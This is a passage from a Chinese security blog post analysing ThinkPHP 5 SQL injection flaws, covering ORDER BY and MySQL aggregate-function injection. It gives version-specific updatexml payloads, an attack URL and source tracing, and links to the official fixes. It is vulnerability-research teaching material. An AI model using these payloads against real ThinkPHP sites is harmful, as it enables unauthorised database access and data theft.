$key, <span class="literal">true</span>) . $sort;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27; ORDER BY &#x27;</span> . implode(<span class="string">&#x27;,&#x27;</span>, $array);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在上面的函数中，<code>$order</code> 即是我们输入的数据，然后经过了<code>parseKey</code> 方法处理后返回给<code>$array</code>。</p>
<p>跟进查看该方法的实现。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915233128.png" alt="image-20200915231942203"></p>
<p>该方法在变量<code>$key</code> 的两端添加了反引号进行拼接，并且没有任何过滤。再和精心构造好的Payload 结合后</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915233201.png" alt="image-20200915230823430"></p>
<p>最终返回了一个带有<code>ORDER BY</code> 的 SQL 注入 payload 给要执行的SQL语句，实现<code>ORDER BY</code> 注入。</p>
<h2 id="利用总结-4"><a href="#利用总结-4" class="headerlink" title="利用总结"></a>利用总结</h2><p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915233944.png" alt="8"></p>
<h2 id="漏洞修复-4"><a href="#漏洞修复-4" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><p><a target="_blank" rel="noopener" href="https://github.com/top-think/framework/commit/673e505421b25bdee2f02b668e5fd1ac79a3d190">https://github.com/top-think/framework/commit/673e505421b25bdee2f02b668e5fd1ac79a3d190</a></p>
<h1 id="SQL注入六-Mysql聚合函数注入"><a href="#SQL注入六-Mysql聚合函数注入" class="headerlink" title="SQL注入六(Mysql聚合函数注入)"></a>SQL注入六(Mysql聚合函数注入)</h1><h2 id="POC-5"><a href="#POC-5" class="headerlink" title="POC"></a>POC</h2><p>不同版本 <strong>payload</strong> 需稍作调整：</p>
<p><strong>5.0.0~5.0.21</strong> 、 <strong>5.1.3～5.1.10</strong> ： <strong>id)%2bupdatexml(1,concat(0x7,user(),0x7e),1) from users%23</strong></p>
<p><strong>5.1.11～5.1.25</strong> ： <strong>id`)%2bupdatexml(1,concat(0x7,user(),0x7e),1) from users%23</strong></p>
<p>这里以<code>5.1.25</code> 版本的ThinkPHP 进行漏洞分析。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;public&#x2F;index&#x2F;index?options&#x3D;id&#96;)%2bupdatexml(1,concat(0x7,user(),0x7e),1) from users%23</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200916003016.png" alt="image-20200916003000509"></p>
<h2 id="影响版本-5"><a href="#影响版本-5" class="headerlink" title="影响版本"></a>影响版本</h2><p> <strong>5.0.0&lt;=ThinkPHP&lt;=5.0.21</strong> 、 <strong>5.1.3&lt;=ThinkPHP5&lt;=5.1.25</strong> </p>
<h2 id="漏洞概述-5"><a href="#漏洞概述-5" class="headerlink" title="漏洞概述"></a>漏洞概述</h2><p>本次漏洞存在于所有 <strong>Mysql</strong> 聚合函数相关方法。由于程序没有对数据进行很好的过滤，直接将数据拼接进 <strong>SQL</strong> 语句，最终导致 <strong>SQL注入漏洞</strong> 的产生。</p>
<h2 id="漏洞分析-5"><a href="#漏洞分析-5" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>和之前的分析思路一样，先去Github 上找更新版本的commit 记录。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200916004546.png" alt="image-20200916003529194"></p>
<p><a target="_blank" rel="noopener" href="https://github.com/top-think/framework/commit/26a1b2fe9571c151ccd5e7ad05b3bb33385ecde3">https://github.com/top-think/framework/commit/26a1b2fe9571c151ccd5e7ad05b3bb33385ecde3</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200916014204.png" alt="image-20200916004737749"></p>
<p>新增加了一条<code>if</code> 判断 语句，用来抛出异常。</p>
<p>和前几个ThinkPHP 5 SQL 注入漏洞一样，程序都会进入到<code>Query</code> 类中，此处在<code>../application/index/controller/index.php</code> 中，模拟的代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">app</span>\<span class="title">index</span>\<span class="title">controller</span>;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Index</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">index</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        $options = request()-&gt;get(<span class="string">&#x27;options&#x27;</span>);</span><br><span class="line">        $result = db(<span class="string">&#x27;users&#x27;</span>)-&gt;max($options);</span><br><span class="line">        var_dump($result);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>因此会先进入到<code>Query</code>类 的 <code>max</code> 方法。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200916014143.png" alt="image-20200916010724376"></p>
<p>用户的输入传给了<code>field</code> ：id`)+updatexml(1,concat(0x7,user(),0x7e),1) from users#</p>
<p>然后该方法继续调用了<code>aggregate</code> 方法，该方法接着调用了<code>$this-&gt;connection</code> 的 <code>aggregate</code>方法，而<code>$this-&gt;connection</code> 为<code>think\db\connector\Mysql</code> 类，而<code>Mysql</code>类继承与<code>Connection</code> 类，故调用该类的<code>aggregate</code> 方法，该方法又调用了<code>$this-&gt;builder</code>，此处为<code>think\db\Builder\Mysql</code> 类的 <code>parseKey</code> 方法。该方法和SQL注入五起到的作用一样。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200916014123.png" alt="image-20200916012332355"></p>
<p>理清了调用情况。具体说<code>parseKey</code>方法的作用</p>
<blockquote>
<p><strong>parseKey</strong> 方法主要是对字段和表名进行处理，这里只是对我们的数据两端都添加了反引号。经过 <strong>parseKey</strong> 方法处理后，程序又回到了上图的 <strong>$this-&gt;value()</strong> 方法中，该方法会调用 <strong>Builder</strong> 类的 <strong>select</strong> 方法来构造 <strong>SQL</strong> 语句。这个方法应该说是在分析 <strong>ThinkPHP</strong> 漏洞时，非常常见的了。其无非就是使用 <strong>str_replace</strong> 方法，将变量替换到 <strong>SQL</strong> 语句模板中。这里，我们重点关注 <strong>parseField</strong> 方法，因为用户可控数据存储在 <strong>$options[‘field’]</strong> 变量中并被传入该方法。</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">select</span>(<span class="params">Query $query</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $options = $query-&gt;getOptions();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> str_replace(</span><br><span class="line">        [<span class="string">&#x27;%TABLE%&#x27;</span>, <span class="string">&#x27;%DISTINCT%&#x27;</span>, <span class="string">&#x27;%FIELD%&#x27;</span>, <span class="string">&#x27;%JOIN%&#x27;</span>, <span class="string">&#x27;%WHERE%&#x27;</span>, <span class="string">&#x27;%GROUP%&#x27;</span>, <span class="string">&#x27;%HAVING%&#x27;</span>, <span class="string">&#x27;%ORDER%&#x27;</span>, <span class="string">&#x27;%LIMIT%&#x27;</span>, <span class="string">&#x27;%UNION%&#x27;</span>, <span class="string">&#x27;%LOCK%&#x27;</span>, <span class="string">&#x27;%COMMENT%&#x27;</span>, <span class="string">&#x27;%FORCE%&#x27;</span>],</span><br><span class="line">        [</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseTable($query, $options[<span class="string">&#x27;table&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseDistinct($query, $options[<span class="string">&#x27;distinct&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseField($query, $options[<span class="string">&#x27;field&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseJoin($query, $options[<span class="string">&#x27;join&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseWhere($query, $options[<span class="string">&#x27;where&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseGroup($query, $options[<span class="string">&#x27;group&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseHaving($query, $options[<span class="string">&#x27;having&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseOrder($query, $options[<span class="string">&#x27;order&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseLimit($query, $options[<span class="string">&#x27;limit&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseUnion($query, $options[<span class="string">&#x27;union&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseLock($query, $options[<span class="string">&#x27;lock&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseComment($query, $options[<span class="string">&#x27;comment&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseForce($query, $options[<span class="string">&#x27;force&#x27;</span>]),</span><br><span class="line">        ],</span><br><span class="line">        <span class="keyword">$this</span>-&gt;selectSql);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>跟进<code>parseFieid</code>方法，</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="function"><span class="keyword">function</span> <span class="title">parseField</span>(<span class="params">Query $query, $fields</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="string">&#x27;*&#x27;</span> == $fields || <span class="keyword">empty</span>($fields)) &#123;</span><br><span class="line">        $fieldsStr = <span class="string">&#x27;*&#x27;</span>;</span><br><span class="line">    &#125; <span class="keyword">elseif</span> (is_array($fields)) &#123;</span><br><span class="line">        <span class="comment">// 支持 &#x27;field1&#x27;=&gt;&#x27;field2&#x27; 这样的字段别名定义</span></span><br><span class="line">        $array = [];</span><br><span class="line"></span><br><span class="line">        <span class="keyword">foreach</span> ($fields <span class="keyword">as</span> $key =&gt; $field) &#123;</span><br><span class="line">            <span class="keyword">if</span> (!is_numeric($key)) &#123;</span><br><span class="line">                $array[] = <span class="keyword">$this</span>-&gt;parseKey($query, $key) . <span class="string">&#x27; AS &#x27;</span> . <span class="keyword">$this</span>-&gt;parseKey($query, $field, <span class="literal">true</span>);</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                $array[] = <span class="keyword">$this</span>-&gt;parseKey($query, $field);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        $fieldsStr = implode(<span class="string">&#x27;,&#x27;</span>, $array);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> $fieldsStr;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>该方法未做任何过滤，用户可控数据只是经过 <strong>parseKey</strong> 方法处理，并不影响数据，然后直接用逗号拼接，最终直接替换进 <strong>SQL</strong> 语句模板里，导致 <strong>SQL注入漏洞</strong> 的发生</p>
<h2 id="利用总结-5"><a href="#利用总结-5" class="headerlink" title="利用总结"></a>利用总结</h2><p><img src="https://github.com/Ifonly-go2019/ThinkPHP-Vuln/raw/master/ThinkPHP5/ThinkPHP5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B9%8BSQL%E6%B3%A8%E5%85%A56/7.png" alt="7"></p>
<h2 id="漏洞修复-5"><a href="#漏洞修复-5" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><p>官方的修复方法是：当匹配到除了 <strong>字母、点号、星号</strong> 以外的字符时，就抛出异常。</p>
<p> <img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200916014204.png" alt="image-20200916004737749"></p>

    </article>
    <!-- license  -->
    
        <div class="license-wrapper">
            <p>Author：<a href="https://hack-for.fun">m0nk3y</a>
            <p>原文链接：<a href="https://hack-for.fun/69fea760.html">https://hack-for.fun/69fea760.html</a>
            <p>发表日期：<a href="https://hack-for.fun/69fea760.html">September 13th 2020, 1:40:27 pm</a>
            <p>更新日期：<a href="https://hack-for.fun/69fea760.html">September 23rd 2020, 11:04:24 am</a>
            <p>版权声明：<b>原创文章转载时请注明出处</b></p>
        </div>
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href= "/8d0f.html" title= "ThinkPHP5漏洞学习-文件包含漏洞">
                    <div class="nextTitle">ThinkPHP5漏洞学习-文件包含漏洞</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href= "/844d1b07.html" title= "新秀企业网站系统代码审计学习(复现)">
                    <div class="prevTitle">新秀企业网站系统代码审计学习(复现)</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- gitalk评论 -->

    <!-- utteranc评论 -->

    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:ifonlysec@gmail.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
            
                <a href="/atom.xml" class="iconfont-archer rss" target="_blank" title=rss></a>
            
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
    
    <span id="busuanzi_container_site_uv">累计访客量: <span id="busuanzi_value_site_uv"></span> </span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E4%B8%80-insert"><span class="toc-number">1.</span> <span class="toc-text">SQL注入一(insert)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#POC"><span class="toc-number">1.1.</span> <span class="toc-text">POC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC"><span class="toc-number">1.2.</span> <span class="toc-text">影响版本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%A6%82%E8%BF%B0"><span class="toc-number">1.3.</span> <span class="toc-text">漏洞概述</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-number">1.4.</span> <span class="toc-text">漏洞分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93"><span class="toc-number">1.5.</span> <span class="toc-text">利用总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D"><span class="toc-number">1.6.</span> <span class="toc-text">漏洞修复</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E4%BA%8C-update"><span class="toc-number">2.</span> <span class="toc-text">SQL注入二(update)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#POC-1"><span class="toc-number">2.1.</span> <span class="toc-text">POC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC-1"><span class="toc-number">2.2.</span> <span class="toc-text">影响版本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%A6%82%E8%BF%B0-1"><span class="toc-number">2.3.</span> <span class="toc-text">漏洞概述</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-1"><span class="toc-number">2.4.</span> <span class="toc-text">漏洞分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93-1"><span class="toc-number">2.5.</span> <span class="toc-text">利用总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D-1"><span class="toc-number">2.6.</span> <span class="toc-text">漏洞修复</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E4%B8%89-select"><span class="toc-number">3.</span> <span class="toc-text">SQL注入三(select)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#POC-2"><span class="toc-number">3.1.</span> <span class="toc-text">POC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC-2"><span class="toc-number">3.2.</span> <span class="toc-text">影响版本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%A6%82%E8%BF%B0-2"><span class="toc-number">3.3.</span> <span class="toc-text">漏洞概述</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-2"><span class="toc-number">3.4.</span> <span class="toc-text">漏洞分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93-2"><span class="toc-number">3.5.</span> <span class="toc-text">利用总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D-2"><span class="toc-number">3.6.</span> <span class="toc-text">漏洞修复</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E5%9B%9B-select"><span class="toc-number">4.</span> <span class="toc-text">SQL注入四(select)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#POC-3"><span class="toc-number">4.1.</span> <span class="toc-text">POC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC-3"><span class="toc-number">4.2.</span> <span class="toc-text">影响版本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%A6%82%E8%BF%B0-3"><span class="toc-number">4.3.</span> <span class="toc-text">漏洞概述</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-3"><span class="toc-number">4.4.</span> <span class="toc-text">漏洞分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93-3"><span class="toc-number">4.5.</span> <span class="toc-text">利用总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D-3"><span class="toc-number">4.6.</span> <span class="toc-text">漏洞修复</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E4%BA%94-order-by"><span class="toc-number">5.</span> <span class="toc-text">SQL注入五(order by)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#POC-4"><span class="toc-number">5.1.</span> <span class="toc-text">POC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC-4"><span class="toc-number">5.2.</span> <span class="toc-text">影响版本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%A6%82%E8%BF%B0-4"><span class="toc-number">5.3.</span> <span class="toc-text">漏洞概述</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-4"><span class="toc-number">5.4.</span> <span class="toc-text">漏洞分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93-4"><span class="toc-number">5.5.</span> <span class="toc-text">利用总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D-4"><span class="toc-number">5.6.</span> <span class="toc-text">漏洞修复</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E5%85%AD-Mysql%E8%81%9A%E5%90%88%E5%87%BD%E6%95%B0%E6%B3%A8%E5%85%A5"><span class="toc-number">6.</span> <span class="toc-text">SQL注入六(Mysql聚合函数注入)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#POC-5"><span class="toc-number">6.1.</span> <span class="toc-text">POC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC-5"><span class="toc-number">6.2.</span> <span class="toc-text">影响版本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%A6%82%E8%BF%B0-5"><span class="toc-number">6.3.</span> <span class="toc-text">漏洞概述</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-5"><span class="toc-number">6.4.</span> <span class="toc-text">漏洞分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93-5"><span class="toc-number">6.5.</span> <span class="toc-text">利用总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D-5"><span class="toc-number">6.6.</span> <span class="toc-text">漏洞修复</span></a></li></ol></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 22
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2020 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/23</span><a class="archive-post-title" href= "/a45.html" >ThinkPHP5漏洞学习-RCE</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/22</span><a class="archive-post-title" href= "/5dcc.html" >CSS 注入学习笔记</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/21</span><a class="archive-post-title" href= "/0.html" >《透视APT》读书笔记</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/16</span><a class="archive-post-title" href= "/8d0f.html" >ThinkPHP5漏洞学习-文件包含漏洞</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/13</span><a class="archive-post-title" href= "/69fea760.html" >ThinkPHP5漏洞学习-SQL注入</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/12</span><a class="archive-post-title" href= "/844d1b07.html" >新秀企业网站系统代码审计学习(复现)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/11</span><a class="archive-post-title" href= "/4fd81e40.html" >MacOS 下配置PHP代码审计环境，PHP调试学习</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/11</span><a class="archive-post-title" href= "/66043e4c.html" >WAF Bypass 姿势总结</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/09</span><a class="archive-post-title" href= "/fb2051a0.html" >CTF-XSS</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/07</span><a class="archive-post-title" href= "/936f84c6.html" >CTF-SSTI</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/07</span><a class="archive-post-title" href= "/54449ea6.html" >Windows 服务器应急响应</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/04</span><a class="archive-post-title" href= "/e312198e.html" >Linux 服务器应急响应</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/03</span><a class="archive-post-title" href= "/7881c78e.html" >CTF - 文件包含</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/30</span><a class="archive-post-title" href= "/dbb484a9.html" >CTF - RCE</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/30</span><a class="archive-post-title" href= "/103ec22a.html" >CTF - 文件上传</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/29</span><a class="archive-post-title" href= "/bc077bb7.html" >HTTP request smuggling(请求走私)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/27</span><a class="archive-post-title" href= "/a4738b93.html" >CTF Tricks 总结</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/26</span><a class="archive-post-title" href= "/13bb2df2.html" >iptables 学习</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/26</span><a class="archive-post-title" href= "/c10c5ca9.html" >Redis 安全学习笔记</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/26</span><a class="archive-post-title" href= "/e42fccb.html" >常见端口服务漏洞</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/25</span><a class="archive-post-title" href= "/56cfbe5.html" >PHP CVE、ThinkPHP、PhpMyAdmin、PHP 安全学习笔记</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/25</span><a class="archive-post-title" href= "/d8714939.html" >PHP以及MYSQL相关版本差异及对应的安全问</a>
        </li>
    
    </div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
        <span class="sidebar-tag-name" data-tags="渗透测试"><span class="iconfont-archer">&#xe606;</span>渗透测试</span>
    
